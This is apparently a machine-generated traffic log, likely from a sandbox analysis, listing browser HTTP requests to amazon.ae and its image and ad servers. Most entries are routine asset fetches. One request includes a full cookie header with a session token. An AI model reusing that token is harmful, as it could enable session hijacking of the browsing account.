Source: global trafficHTTP traffic detected: GET /images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51+h1QnUXbL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71YWhKvDA+L.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21cN4KWOfCL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61OdLUpG-FL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11+d9I1l9AL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71Ii794TdiL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01cS+tLhj4L.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01490L6yBnL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xaWmFh45L.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&SldMFpTZ HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11Hy-4jiUaL.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11Q6G8iTFZL.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986211_UAE_Budget_Store_AE_xsite_baby_essentials_en_400x400_2X._CB644457596_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61EnuTSAVeL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71aG0m9XRcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61B0Z0Buu6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61eHRzWQzhL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01cS+tLhj4L.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01490L6yBnL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xaWmFh45L.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&SldMFpTZ HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259753_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259754_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61m4NR7APqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ&pj=%7B%22measurementMethod%22%3A%22btr_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81ybujRNAXL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /x/px/RLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ/atf/%7B%22atf%22:false%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71aG0m9XRcL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61B0Z0Buu6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61eHRzWQzhL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/914aX7nCqFL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61SpqN46FvL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61EnuTSAVeL._SX1500_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61Maf8rwu-L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cross_border_interstitial_sp/render HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469020355&tb:C37SFEY0GDXEZ5HDEVRN+s-C37SFEY0GDXEZ5HDEVRN|1723469020355
Source: global trafficHTTP traffic detected: GET /images/I/61m4NR7APqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81ybujRNAXL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
